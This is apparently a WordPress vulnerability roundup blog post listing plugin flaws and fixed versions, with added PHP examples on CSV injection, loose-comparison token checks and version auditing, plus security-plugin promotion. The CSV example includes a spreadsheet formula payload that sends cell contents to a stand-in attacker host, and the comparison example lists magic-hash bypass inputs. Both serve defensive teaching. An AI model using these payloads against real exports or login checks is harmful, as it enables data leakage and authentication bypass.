New WordPress plugin and theme vulnerabilities were disclosed during the second half of July, so we want to keep you aware. In this post, we cover recent WordPress plugin, theme and core vulnerabilities and what to do if you are running one of the vulnerable plugins or themes on your website.
The WordPress Vulnerability Roundup is divided into three different categories:
WordPress Core Vulnerabilities
There have not been any WordPress core vulnerabilities disclosed in the second half of July.
WordPress Plugin Vulnerabilities
1. Wise Chat
Wise Chat versions below 2.8.4 have a CSV Injection vulnerability.
2. Powie’s WHOIS Domain Check
Powie’s WHOIS Domain Check versions below 0.9.33 have an Authenticated Stored Cross-Site Scripting vulnerability.
3. Knight Lab Timeline
Knight Lab Timeline versions below 3.7.0.0 bundle an outdated version of the TimelineJS library, which could lead to a Stored Cross-Site Scripting vulnerability.
4. Page Builder: KingComposer
Page Builder: KingComposer versions below 2.9.5 have an Unauthenticated Reflected Cross-Site Scripting vulnerability.
5. SRS Simple Hits Counter
SRS Simple Hits Counter versions below 1.1.0 have an Unauthenticated Blind SQL Injection vulnerability.
6. WP-Live Chat by 3CX
WP-Live Chat by 3CX versions below 8.2.0 have an Authenticated Stored Cross-Site Scripting vulnerability.
7. Newsletter
Newsletter versions below 6.7.7 have an Authenticated Stored Cross-Site Scripting vulnerability.
8. Form Maker by 10Web
Form Maker by 10Web versions below 1.13.40 have an Authenticated Reflected Cross-Site Scripting vulnerability.
9. SendPress Newsletters
SendPress Newsletters versions below 1.20.7.13 have an Authenticated Stored Cross-Site Scripting vulnerability.
10. Email Verification for WooCommerce
Email Verification for WooCommerce versions below 1.8.2 have a Loose Comparison vulnerability that leads to Authentication Bypass.
11. All in One SEO Pack
All in One SEO Pack versions below 3.6.2 have an Authenticated Stored Cross-Site Scripting vulnerability.
12. JobSearch WP Job Board
JobSearch WP Job Board versions below 1.5.5 have an Unauthenticated Reflected Cross-Site Scripting vulnerability.
13. Email Subscribers & Newsletters
Email Subscribers & Newsletters versions below 4.5.1 have an Authenticated SQL Injection vulnerability in es_newsletters_settings_callback() and a Cross-Site Request Forgery vulnerability in send_test_email().
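CSV Injection (item 1 above) is easy to miss because the exported file looks harmless until a spreadsheet opens it. The following PHP is an added illustration, not code from Wise Chat or any other plugin in this list: a hypothetical chat-log export with constructed rows, showing a formula payload passing straight through fputcsv() and the prefix check that neutralises it. All function names are assumptions for the example.

```php
<?php
// Added illustration (not code from Wise Chat or any plugin above): a
// hypothetical chat-log CSV export showing a formula-injection payload and
// how to neutralise cells before writing them.

declare(strict_types=1);

// Excel/LibreOffice treat a cell as a formula when it starts with one of
// these characters; tab and carriage return are included because some
// parsers skip them before looking at the first visible character.
function csv_cell_is_dangerous(string $cell): bool
{
    return $cell !== '' && strpos("=+-@\t\r", $cell[0]) !== false;
}

// Prefix a dangerous cell with a single quote so spreadsheets keep it as
// text. The quote stays visible in some viewers; that is the accepted
// trade-off. fputcsv() still handles the CSV-level quoting of the cell.
function csv_sanitize_cell(string $cell): string
{
    return csv_cell_is_dangerous($cell) ? "'" . $cell : $cell;
}

// Write rows to an in-memory stream and return the CSV text.
function export_rows_csv(array $rows, bool $sanitize): string
{
    $fh = fopen('php://memory', 'r+');
    foreach ($rows as $row) {
        $row = array_map('strval', $row);
        if ($sanitize) {
            $row = array_map('csv_sanitize_cell', $row);
        }
        // Empty escape string: no backslash escaping, only RFC-style quoting.
        fputcsv($fh, $row, ',', '"', '');
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed rows: the third "message" is a formula payload that leaks the
// contents of cell A2 to an attacker-controlled URL when the link is clicked.
$rows = [
    ['user',    'message'],
    ['alice',   'hello'],
    ['mallory', '=HYPERLINK("http://attacker.example/?"&A2,"click me")'],
    ['bob',     '-1+1'],
];

echo "Unsanitised:\n", export_rows_csv($rows, false), "\n";
echo "Sanitised:\n",   export_rows_csv($rows, true);
```

Run it with `php` on the command line and compare the two outputs: in the unsanitised export the mallory row begins with `=`, so a spreadsheet evaluates it; in the sanitised export both the `=HYPERLINK(...)` cell and bob's `-1+1` are prefixed with `'` and stay inert text. Apply the check to every cell of user-controlled origin, not just the message column.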
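The "Loose Comparison" class named for item 10 above is specific to PHP: `==` converts operands before comparing them, so two strings that both look numeric (for example an md5 hash of the form `0e` followed only by digits, which PHP reads as zero) compare equal even though they are different strings. The PHP below is an added example and does not reproduce the Email Verification for WooCommerce code; it contrasts a hypothetical loose token check with a strict, constant-time one over constructed inputs. Function names and sample values are assumptions.

```php
<?php
// Added illustration, not code from any plugin listed above: a hypothetical
// verification-token check showing why PHP's loose (==) comparison is
// unsafe for secrets and how to compare them strictly.

declare(strict_types=1);

// Loose comparison: the pattern to avoid. Numeric-looking strings are
// compared as numbers, and null/"" compare equal to each other.
function verify_token_loose($stored, $supplied): bool
{
    return $supplied == $stored;
}

// Strict comparison: reject anything that is not a non-empty string (arrays,
// ints, null, an unset token) and compare in constant time.
function verify_token_strict($stored, $supplied): bool
{
    if (!is_string($stored) || !is_string($supplied) || $stored === '') {
        return false;
    }
    return hash_equals($stored, $supplied);
}

// Constructed cases: [stored token, value supplied by the requester].
// The two "0e..." values are numeric strings in PHP and both evaluate to 0.
$cases = [
    ['0e462097431906509019562988736854', '0e830400451993494058024219903391'],
    ['0e462097431906509019562988736854', '0'],
    ['a3f9c1', 'a3f9c1'],   // genuine match
    ['a3f9c1', 'A3F9C1'],   // wrong case, no match
    ['',       ''],         // token never set
    [null,     ''],         // token missing from storage
];

foreach ($cases as [$stored, $supplied]) {
    printf("stored=%-34s supplied=%-34s loose=%-5s strict=%s\n",
        var_export($stored, true),
        var_export($supplied, true),
        verify_token_loose($stored, $supplied) ? 'true' : 'false',
        verify_token_strict($stored, $supplied) ? 'true' : 'false');
}
```

Running this prints `loose=true` for the first two rows (different strings accepted as equal), for the empty/empty row and for the null/empty row, while `strict` accepts only the genuine `a3f9c1` match. When auditing a plugin, look for `==` or `!=` applied to tokens, nonces, activation keys or hashes, and for comparisons where the stored side can be null because the record was never populated.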
WordPress Theme Vulnerabilities
There have been no WordPress theme vulnerabilities disclosed in the second half of July.
New! Protect Your WordPress Website with the iThemes Security Site Scan
Every day, it gets harder and harder to keep track of every disclosed WordPress vulnerability. You have to compare that list to the versions of plugins and themes you have installed on your site… and make sure you’re constantly updating.
To solve this problem, the iThemes Security Pro plugin now includes a better way to protect your sites against software vulnerabilities, the number one culprit of hacked and compromised WordPress sites.
The new, improved WordPress Security Site Scan powered by iThemes performs automatic checks for known website vulnerabilities and, if a patch is available, iThemes Security Pro will now automatically apply the fix for you… so you don’t have to. Whew, that’s some peace of mind.
From your WordPress security logs, you can now click the more details link to learn about the vulnerability, including the vulnerable version number, the type of vulnerability, the patched version number, disclosure timeline and more.
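The manual cross-check described at the start of this section (compare each disclosed "below X" version with what is installed) is a version comparison, and it has to be a numeric one: string comparison would rank 3.6.10 below 3.6.2. The PHP below is an added example, not part of iThemes Security or of this post's tooling. It takes the fixed-in versions from the list above and flags a constructed inventory; on a real site the inventory would come from `wp plugin list --fields=title,version --format=json`, and the titles must match what each plugin's header reports. Function names are assumptions.

```php
<?php
// Added example (not part of the iThemes post or iThemes Security): flag
// installed plugins whose version is below the fixed version listed above.

declare(strict_types=1);

// Fixed-in versions from the roundup: a site is affected while it runs
// anything *below* the stated version.
const FIXED_IN = [
    'Wise Chat'                          => '2.8.4',
    'Powie’s WHOIS Domain Check'         => '0.9.33',
    'Knight Lab Timeline'                => '3.7.0.0',
    'Page Builder: KingComposer'         => '2.9.5',
    'SRS Simple Hits Counter'            => '1.1.0',
    'WP-Live Chat by 3CX'                => '8.2.0',
    'Newsletter'                         => '6.7.7',
    'Form Maker by 10Web'                => '1.13.40',
    'SendPress Newsletters'              => '1.20.7.13',
    'Email Verification for WooCommerce' => '1.8.2',
    'All in One SEO Pack'                => '3.6.2',
    'JobSearch WP Job Board'             => '1.5.5',
    'Email Subscribers & Newsletters'    => '4.5.1',
];

/**
 * Return [title, installed version, fixed-in version] for every installed
 * plugin that is in the roundup and still below its fixed version.
 *
 * @param array<string,string> $installed plugin title => installed version
 * @param array<string,string> $fixed_in  plugin title => first fixed version
 * @return array<int,array{0:string,1:string,2:string}>
 */
function vulnerable_plugins(array $installed, array $fixed_in = FIXED_IN): array
{
    $hits = [];
    foreach ($installed as $title => $version) {
        // version_compare() handles dotted versions of unequal length
        // (3.6.10 > 3.6.2, 1.20.7.13 < 1.20.8) where a string compare fails.
        if (isset($fixed_in[$title]) && version_compare($version, $fixed_in[$title], '<')) {
            $hits[] = [$title, $version, $fixed_in[$title]];
        }
    }
    return $hits;
}

// Constructed inventory standing in for the output of
//   wp plugin list --fields=title,version --format=json
$installed = [
    'Wise Chat'                       => '2.8.3',  // below 2.8.4: affected
    'Newsletter'                      => '6.7.7',  // exactly the fixed version: ok
    'All in One SEO Pack'             => '3.6.10', // newer than 3.6.2: ok
    'Email Subscribers & Newsletters' => '4.5.0',  // below 4.5.1: affected
    'Hello Dolly'                     => '1.7.2',  // not in the roundup: ignored
];

foreach (vulnerable_plugins($installed) as [$title, $version, $fixed]) {
    printf("UPDATE %s: installed %s, fixed in %s\n", $title, $version, $fixed);
}
```

With the constructed inventory this reports only Wise Chat and Email Subscribers & Newsletters. Note that a plugin absent from the list is not reported at all, so the check is only as complete as the roundup it is fed; rerun it against each new roundup rather than treating one pass as a clean bill of health.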

A WordPress Security Plugin Can Help Secure Your Website
iThemes Security Pro, our WordPress security plugin, offers 50+ ways to secure and protect your website from common WordPress security vulnerabilities. With WordPress two-factor authentication, brute force protection, strong password enforcement, and more, you can add an extra layer of security to your website.
The post WordPress Vulnerability Roundup: July 2020, Part 2 appeared first on iThemes.